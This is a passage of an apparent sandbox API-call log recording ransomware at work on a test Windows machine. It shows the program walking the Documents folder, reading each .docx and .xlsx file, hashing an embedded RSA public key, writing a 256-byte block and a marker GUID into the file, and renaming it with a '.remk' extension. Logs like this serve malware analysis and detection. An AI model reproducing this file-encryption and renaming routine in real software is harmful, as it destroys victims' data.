Flags=0x0, Size=0x64) returned 0x7051d8 [0231.738] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xacbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.738] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.738] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.738] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.738] CloseHandle (hObject=0x640) returned 1 [0231.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0231.742] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UWCg-ihWXmwSV 3j.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2uwcg-ihwxmwsv 3j.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UWCg-ihWXmwSV 3j.docx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2uwcg-ihwxmwsv 3j.docx.remk")) returned 1 [0231.744] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb30cd4f0, ftCreationTime.dwHighDateTime=0x1d591ad, ftLastAccessTime.dwLowDateTime=0xf4d8bc70, ftLastAccessTime.dwHighDateTime=0x1d5cdbf, ftLastWriteTime.dwLowDateTime=0xf4d8bc70, ftLastWriteTime.dwHighDateTime=0x1d5cdbf, nFileSizeHigh=0x0, nFileSizeLow=0x188cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7usc5a5L9F_yM.xlsx", cAlternateFileName="7USC5A~1.XLS")) returned 1 [0231.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.744] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7usc5a5L9F_yM.xlsx") returned=".xlsx" [0231.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7usc5a5L9F_yM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7usc5a5l9f_ym.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.747] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=100556) returned 1 [0231.747] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.750] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x188a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.750] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.752] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x188cc, lpOverlapped=0x0) returned 1 [0231.753] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.753] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.753] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.753] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.754] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.754] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.754] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.755] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.755] GetLastError () returned 0x0 [0231.755] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.755] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.755] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.755] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.755] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.756] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.757] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x188cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.757] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.757] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.757] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.757] CloseHandle (hObject=0x640) returned 1 [0231.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.762] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7usc5a5L9F_yM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7usc5a5l9f_ym.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7usc5a5L9F_yM.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7usc5a5l9f_ym.xlsx.remk")) returned 1 [0231.764] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9472e7c0, ftCreationTime.dwHighDateTime=0x1d5731a, ftLastAccessTime.dwLowDateTime=0x93af9fa0, ftLastAccessTime.dwHighDateTime=0x1d5bd88, ftLastWriteTime.dwLowDateTime=0x93af9fa0, ftLastWriteTime.dwHighDateTime=0x1d5bd88, nFileSizeHigh=0x0, nFileSizeLow=0x10d15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C-gP led9.docx", cAlternateFileName="C-GPLE~1.DOC")) returned 1 [0231.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.764] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C-gP led9.docx") returned=".docx" [0231.764] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C-gP led9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c-gp led9.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.766] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=68885) returned 1 [0231.766] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.768] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10cef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.768] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.770] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x10d15, lpOverlapped=0x0) returned 1 [0231.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.772] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.773] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.773] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.773] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.773] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.773] GetLastError () returned 0x0 [0231.773] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.773] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.773] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.773] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.773] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.774] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.775] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10d15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.775] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.775] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.775] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.775] CloseHandle (hObject=0x640) returned 1 [0231.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.778] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C-gP led9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c-gp led9.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C-gP led9.docx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c-gp led9.docx.remk")) returned 1 [0231.780] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0231.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.780] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0231.780] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9375fb30, ftCreationTime.dwHighDateTime=0x1d5e6cb, ftLastAccessTime.dwLowDateTime=0x39dd0e20, ftLastAccessTime.dwHighDateTime=0x1d55de5, ftLastWriteTime.dwLowDateTime=0x39dd0e20, ftLastWriteTime.dwHighDateTime=0x1d55de5, nFileSizeHigh=0x0, nFileSizeLow=0x872f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eJqlwVHiXQsxuhdL3.xlsx", cAlternateFileName="EJQLWV~1.XLS")) returned 1 [0231.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.780] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eJqlwVHiXQsxuhdL3.xlsx") returned=".xlsx" [0231.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eJqlwVHiXQsxuhdL3.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ejqlwvhixqsxuhdl3.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.781] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=34607) returned 1 [0231.781] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.784] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8709, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.784] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.786] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.786] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x872f, lpOverlapped=0x0) returned 1 [0231.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.787] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.788] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.788] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.788] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.788] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.788] GetLastError () returned 0x0 [0231.789] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.789] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.789] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.789] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.789] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.789] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.790] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x872f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.790] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.790] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.790] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.790] CloseHandle (hObject=0x640) returned 1 [0231.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 